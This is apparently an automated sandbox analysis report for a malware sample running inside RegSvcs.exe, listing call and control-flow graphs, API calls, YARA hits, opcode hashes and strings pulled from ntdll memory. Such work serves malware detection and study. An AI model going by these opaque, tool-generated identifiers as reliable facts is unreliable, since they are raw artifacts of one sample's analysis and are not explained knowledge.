4019fc 91696->91697 91697->91696 91697->91697 91700 42f9f3 91697->91700 91703 42e073 91700->91703 91704 42e096 91703->91704 91715 407273 91704->91715 91706 42e0ac 91707 401b0a 91706->91707 91718 41aed3 91706->91718 91709 42e0cb 91710 42e0e0 91709->91710 91733 42c7d3 91709->91733 91729 4280c3 91710->91729 91713 42e0fa 91714 42c7d3 ExitProcess 91713->91714 91714->91707 91736 4162e3 91715->91736 91717 407280 91717->91706 91719 41aeff 91718->91719 91747 41adc3 91719->91747 91722 41af44 91725 41af60 91722->91725 91727 42c403 NtClose 91722->91727 91723 41af2c 91724 41af37 91723->91724 91726 42c403 NtClose 91723->91726 91724->91709 91725->91709 91726->91724 91728 41af56 91727->91728 91728->91709 91730 428125 91729->91730 91732 428132 91730->91732 91758 418433 91730->91758 91732->91713 91734 42c7f0 91733->91734 91735 42c801 ExitProcess 91734->91735 91735->91710 91737 4162fd 91736->91737 91739 416313 91737->91739 91740 42ce73 91737->91740 91739->91717 91742 42ce8d 91740->91742 91741 42cebc 91741->91739 91742->91741 91743 42ba53 LdrInitializeThunk 91742->91743 91744 42cf16 91743->91744 91745 42e483 RtlFreeHeap 91744->91745 91746 42cf2c 91745->91746 91746->91739 91748 41add3 91747->91748 91752 41aeb9 91748->91752 91753 42baf3 91748->91753 91751 42c403 NtClose 91751->91752 91752->91722 91752->91723 91754 42bb0d 91753->91754 91757 10235c0 LdrInitializeThunk 91754->91757 91755 41aead 91755->91751 91757->91755 91759 418436 91758->91759 91765 41895b 91759->91765 91766 413ae3 91759->91766 91761 41858a 91762 42e483 RtlFreeHeap 91761->91762 91761->91765 91763 4185a2 91762->91763 91764 42c7d3 ExitProcess 91763->91764 91763->91765 91764->91765 91765->91732 91767 413b03 91766->91767 91769 413b6c 91767->91769 91771 41b1e3 RtlFreeHeap LdrInitializeThunk 91767->91771 91769->91761 91770 413b62 91770->91761 91771->91770 91772 418b75 91773 42c403 NtClose 91772->91773 91774 418b7f 91773->91774

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 557 4175c3-4175ec call 42f063 560 4175f2-417600 call 42f663 557->560 561 4175ee-4175f1 557->561 564 417610-417621 call 42db43 560->564 565 417602-41760d call 42f903 560->565 570 417623-417637 LdrLoadDll 564->570 571 41763a-41763d 564->571 565->564 570->571
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417635
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 39d31df0b3dcb8a62abc9b7ab0a68387442d46fc0c5f4578072fdff3bb2400e6
                                                                                              • Instruction ID: d7d978ca17a23be20179924de710302cbae343b69d9690fc2c20faa02a0bbe6d
                                                                                              • Opcode Fuzzy Hash: 39d31df0b3dcb8a62abc9b7ab0a68387442d46fc0c5f4578072fdff3bb2400e6
                                                                                              • Instruction Fuzzy Hash: 960171B1E0020DBBDF10DBE5DC42FDEB3789B54308F4041AAE90897241F634EB498B95

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 577 42c403-42c43f call 4046a3 call 42d663 NtClose
                                                                                              APIs
                                                                                              • NtClose.NTDLL(00424814,?,00000000,?,?,00424814,?), ref: 0042C43A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction ID: 850d7256853e839a306d726090fc0cac11ac6aedaeab9746b53f989c2e1abe8e
                                                                                              • Opcode Fuzzy Hash: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction Fuzzy Hash: 99E08C322006147BD220EA5ADC41FEB77ACDFC6714F00442AFA1CA7282CA79B9118BF4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 591 1022b60-1022b6c LdrInitializeThunk
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1f62efa9b9cbba44a136b5f50d7abc1a85674faafdddbf3a2ffbac3301378560
                                                                                              • Instruction ID: cc88e656ca63e523141e2f60e75dc7170723d5a865119ed48ccdf773464f49a8
                                                                                              • Opcode Fuzzy Hash: 1f62efa9b9cbba44a136b5f50d7abc1a85674faafdddbf3a2ffbac3301378560
                                                                                              • Instruction Fuzzy Hash: 8590026120280003510571588414616401E97E0201B55C162F1418590DC52589927225
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c86dee6c68fbfd4b228d4842a968a70d7380e559e2074e6bd2ac922e68a3cbc4
                                                                                              • Instruction ID: f4bf65beb5276a6559fbbdc01e3a5af35e5b4ea5709409326936319f78686d7d
                                                                                              • Opcode Fuzzy Hash: c86dee6c68fbfd4b228d4842a968a70d7380e559e2074e6bd2ac922e68a3cbc4
                                                                                              • Instruction Fuzzy Hash: 8790023120180413E11171588504707001D97D0241F95C553B0828558DD6568A53B221

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 592 1022c70-1022c7c LdrInitializeThunk
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f0c28cf5c6928d7e84b8cf99175084e18d1bfdae93897beb3b7b242470beb994
                                                                                              • Instruction ID: 72ff88da6cb9ee299355fdf36825d6d36ebbdbeaad8fd9c7f72827049d479778
                                                                                              • Opcode Fuzzy Hash: f0c28cf5c6928d7e84b8cf99175084e18d1bfdae93897beb3b7b242470beb994
                                                                                              • Instruction Fuzzy Hash: 8090023120188802E1107158C40474A001997D0301F59C552B4828658DC69589927221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f6bc83b15daa1cb5b364796d2984b76606856db6a772b2a2ec2520a9bbf17010
                                                                                              • Instruction ID: 31423587124eaa862d86048d560ddacb62efffba1a6d8b3b27adb251a9e3b184
                                                                                              • Opcode Fuzzy Hash: f6bc83b15daa1cb5b364796d2984b76606856db6a772b2a2ec2520a9bbf17010
                                                                                              • Instruction Fuzzy Hash: 1990023160590402E10071588514706101997D0201F65C552B0828568DC7958A5276A2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 135 413e28-413e2a 136 413e8d-413edd call 42ef33 call 4175c3 call 404613 call 424c63 135->136 137 413e2c-413e31 135->137 151 413efd-413f03 136->151 152 413edf-413eee PostThreadMessageW 136->152 139 413e33-413e4b 137->139 140 413ddb-413de0 137->140 142 413e70-413e88 call 42e523 139->142 143 413e4e-413e67 139->143 140->135 142->136 143->142 152->151 153 413ef0-413efa 152->153 153->151
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311
                                                                                              • Opcode ID: b27d327982aaacbe1815aa3561c3956a0d8969ddf93c65f011b34d902306ad4b
                                                                                              • Instruction ID: 258f624e8d54d0a2ce80ef83194557ddc5b0f430e08763a36ec555f1065b1194
                                                                                              • Opcode Fuzzy Hash: b27d327982aaacbe1815aa3561c3956a0d8969ddf93c65f011b34d902306ad4b
                                                                                              • Instruction Fuzzy Hash: C3216B72D0120C7ADB009FA59C82DEFBB7CEF41358F04815AF91867251D67D4E068795

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 154 413e69-413edd call 42e523 call 42ef33 call 4175c3 call 404613 call 424c63 166 413efd-413f03 154->166 167 413edf-413eee PostThreadMessageW 154->167 167->166 168 413ef0-413efa 167->168 168->166
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311
                                                                                              • Opcode ID: 30cfbf3af5c148f4377b39f9befa381fec9abbfcb2611037c33402438a9622b2
                                                                                              • Instruction ID: 6e4b7bd3c6d70c0a013a0ae0f99a6f16cdea2706e7eca7d3825f7fed0bedadce
                                                                                              • Opcode Fuzzy Hash: 30cfbf3af5c148f4377b39f9befa381fec9abbfcb2611037c33402438a9622b2
                                                                                              • Instruction Fuzzy Hash: D5112971D0025C7AEB109AE19C82DEFBB7CDB41798F00805AFA1467241D67C4E0687A5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 169 413e73-413e85 170 413e8d-413edd call 42ef33 call 4175c3 call 404613 call 424c63 169->170 171 413e88 call 42e523 169->171 180 413efd-413f03 170->180 181 413edf-413eee PostThreadMessageW 170->181 171->170 181->180 182 413ef0-413efa 181->182 182->180
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311
                                                                                              • Opcode ID: ba791238218d88e58739886ebd4b30216583f7f28d81d6be2acf05ebe8bdc854
                                                                                              • Instruction ID: b1a42ec18e57c21c4f57f993a17a80e688da883e2d9fd3138ce51f6232f242f7
                                                                                              • Opcode Fuzzy Hash: ba791238218d88e58739886ebd4b30216583f7f28d81d6be2acf05ebe8bdc854
                                                                                              • Instruction Fuzzy Hash: 6301D671D0125C7AEB10AAE58C82DEFBB7CDF81798F448069FA1467241D67C4F0687B5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 183 42c783-42c7c7 call 4046a3 call 42d663 RtlFreeHeap
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C7C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: tcA
                                                                                              • API String ID: 3298025750-3820114172
                                                                                              • Opcode ID: 3a692263a625508aba11390bbad87ee4a3c6504f0e382f58c2926c8f172ee798
                                                                                              • Instruction ID: a1110b7af6446969c3bafcd47462c71f8ebbb4676456e54c3c2bde70d5c19a19
                                                                                              • Opcode Fuzzy Hash: 3a692263a625508aba11390bbad87ee4a3c6504f0e382f58c2926c8f172ee798
                                                                                              • Instruction Fuzzy Hash: ADE06D712003047BC610EE59EC41F9B77ACDFC5714F004419FA18A7281D774B910CBB9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 572 42c733-42c777 call 4046a3 call 42d663 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000104,?,0042481F,?,?,0042481F,?,00000104,?), ref: 0042C772
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 344677e02a7d1e9106d7a29a172395bf8147fb59d1e4c0012efe80ee3bd4159a
                                                                                              • Instruction ID: 1275982d632288ed9e3ee1a9e852ab0af1d2f5ec04a2e3514462551ea2413597
                                                                                              • Opcode Fuzzy Hash: 344677e02a7d1e9106d7a29a172395bf8147fb59d1e4c0012efe80ee3bd4159a
                                                                                              • Instruction Fuzzy Hash: 3BE06DB62003047BC614EE59EC45E9B73ACEFC5714F000419FA19A7242D674B9108BB8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 582 42c7d3-42c80f call 4046a3 call 42d663 ExitProcess
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,1F11715F,?,?,1F11715F), ref: 0042C80A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 18bfed7e07fb42f28473e2d2f39dc5bc8f5905f059bacb8a1418a2c0ba712ee0
                                                                                              • Instruction ID: 3d8f571918df2b28369401d3bb3ea30a6dfd9c7cd64a9cd4eb77b957b2b20c8e
                                                                                              • Opcode Fuzzy Hash: 18bfed7e07fb42f28473e2d2f39dc5bc8f5905f059bacb8a1418a2c0ba712ee0
                                                                                              • Instruction Fuzzy Hash: DEE04F722402147BC220AA5ADC41F97775CDBC5714F40442AFA1867282C675B91186E4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 587 1022c0a-1022c0f 588 1022c11-1022c18 587->588 589 1022c1f-1022c26 LdrInitializeThunk 587->589
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: e76998d2c3a54d18d7dd151c7c0ef64fe9101d9bf36dbf610f5304d6736eccd8
                                                                                              • Instruction ID: 57cc7a6a383508bd5361aa5cf3e49bde2ff89d04a1ccd148db5bde39707e9594
                                                                                              • Opcode Fuzzy Hash: e76998d2c3a54d18d7dd151c7c0ef64fe9101d9bf36dbf610f5304d6736eccd8
                                                                                              • Instruction Fuzzy Hash: 97B09B719019D5C5EA51E7A44608717795477D0701F25C1A2E2474741F4738C1D1F275
                                                                                              Strings
                                                                                              • The resource is owned shared by %d threads, xrefs: 01098E2E
                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01098DA3
                                                                                              • *** enter .cxr %p for the context, xrefs: 01098FBD
                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01098F2D
                                                                                              • *** Inpage error in %ws:%s, xrefs: 01098EC8
                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01098E4B
                                                                                              • The critical section is owned by thread %p., xrefs: 01098E69
                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01098F26
                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01098E02
                                                                                              • read from, xrefs: 01098F5D, 01098F62
                                                                                              • The instruction at %p referenced memory at %p., xrefs: 01098EE2
                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01098DC4
                                                                                              • an invalid address, %p, xrefs: 01098F7F
                                                                                              • *** enter .exr %p for the exception record, xrefs: 01098FA1
                                                                                              • The instruction at %p tried to %s , xrefs: 01098F66
                                                                                              • <unknown>, xrefs: 01098D2E, 01098D81, 01098E00, 01098E49, 01098EC7, 01098F3E
                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01098E3F
                                                                                              • a NULL pointer, xrefs: 01098F90
                                                                                              • This failed because of error %Ix., xrefs: 01098EF6
                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01098DD3
                                                                                              • *** then kb to get the faulting stack, xrefs: 01098FCC
                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01098D8C
                                                                                              • The resource is owned exclusively by thread %p, xrefs: 01098E24
                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01098FEF
                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01098DB5
                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01098E86
                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01098F3F
                                                                                              • write to, xrefs: 01098F56
                                                                                              • Go determine why that thread has not released the critical section., xrefs: 01098E75
                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01098F34
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                              • API String ID: 0-108210295
                                                                                              • Opcode ID: 4dab6c0105bfdb4a9f4ac4aeb7d8707bae37fcf5260e89399e2ace9b6c6ab609
                                                                                              • Instruction ID: 6b1c50ab923390e69016edae9c57d1173c1179b38e48d943d63464b4d892e791
                                                                                              • Opcode Fuzzy Hash: 4dab6c0105bfdb4a9f4ac4aeb7d8707bae37fcf5260e89399e2ace9b6c6ab609
                                                                                              • Instruction Fuzzy Hash: 15812775A0020ABFDF159B199C65EAB3B7ADF57B10F044096F2446F352E3B1C501EA63
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2160512332
                                                                                              • Opcode ID: 5f5c483f6c00a090bca197aa95942072b9ee6e3e30d1558a66b0ec4c446894a8
                                                                                              • Instruction ID: 8c2cb9fba5bb607a014e74ec76680e4ed97a67c43924d93b90a5127ff3917e56
                                                                                              • Opcode Fuzzy Hash: 5f5c483f6c00a090bca197aa95942072b9ee6e3e30d1558a66b0ec4c446894a8
                                                                                              • Instruction Fuzzy Hash: 73927C71608342AFE721DF28C881B6BB7E8BB84754F04492DFAD5DB291D774E844CB92
                                                                                              Strings
                                                                                              • Address of the debug info found in the active list., xrefs: 010554AE, 010554FA
                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0105540A, 01055496, 01055519
                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010554E2
                                                                                              • Thread identifier, xrefs: 0105553A
                                                                                              • 8, xrefs: 010552E3
                                                                                              • Critical section debug info address, xrefs: 0105541F, 0105552E
                                                                                              • Critical section address, xrefs: 01055425, 010554BC, 01055534
                                                                                              • double initialized or corrupted critical section, xrefs: 01055508
                                                                                              • Invalid debug info address of this critical section, xrefs: 010554B6
                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01055543
                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010554CE
                                                                                              • undeleted critical section in freed memory, xrefs: 0105542B
                                                                                              • Critical section address., xrefs: 01055502
                                                                                              • corrupted critical section, xrefs: 010554C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                              • API String ID: 0-2368682639
                                                                                              • Opcode ID: 2cc3e5bf3398ae7d35319febcab31d3fe74a8975e2e78d7d0afb035046ecc764
                                                                                              • Instruction ID: f105025483283ac36d2915941a17b7f0037e0e11f0be20922277f10c135d2ab2
                                                                                              • Opcode Fuzzy Hash: 2cc3e5bf3398ae7d35319febcab31d3fe74a8975e2e78d7d0afb035046ecc764
                                                                                              • Instruction Fuzzy Hash: 7F81ABB0A00359AFDB60CF98CD42FAEBBF5BB08B14F14815AF944B7281D779A941CB50
                                                                                              Strings
                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010525EB
                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010522E4
                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01052602
                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01052624
                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010524C0
                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01052412
                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01052498
                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0105261F
                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01052506
                                                                                              • @, xrefs: 0105259B
                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01052409
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                              • API String ID: 0-4009184096
                                                                                              • Opcode ID: d68e52141bf9387ee34cc96c279dda0a295dfc0c2df5b4e2bb258e8e0da56f05
                                                                                              • Instruction ID: 7264fb8cae4ca109b5091e8097760edc04364c8fd278810e7172cbef367d0551
                                                                                              • Opcode Fuzzy Hash: d68e52141bf9387ee34cc96c279dda0a295dfc0c2df5b4e2bb258e8e0da56f05
                                                                                              • Instruction Fuzzy Hash: D80260B1D002299BDB61DB54CD80BEEB7B8AF54304F1041EAEB89A7241DB749F84CF59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                              • API String ID: 0-2515994595
                                                                                              • Opcode ID: 064db5b40d4c82a5fa2434676b6cf58ab72ae510f3be12e280fe3dd4aceca753
                                                                                              • Instruction ID: 959f9927b6cd0c36197764a791b63293140405fb27f5998d0c4ef2a5bc45d226
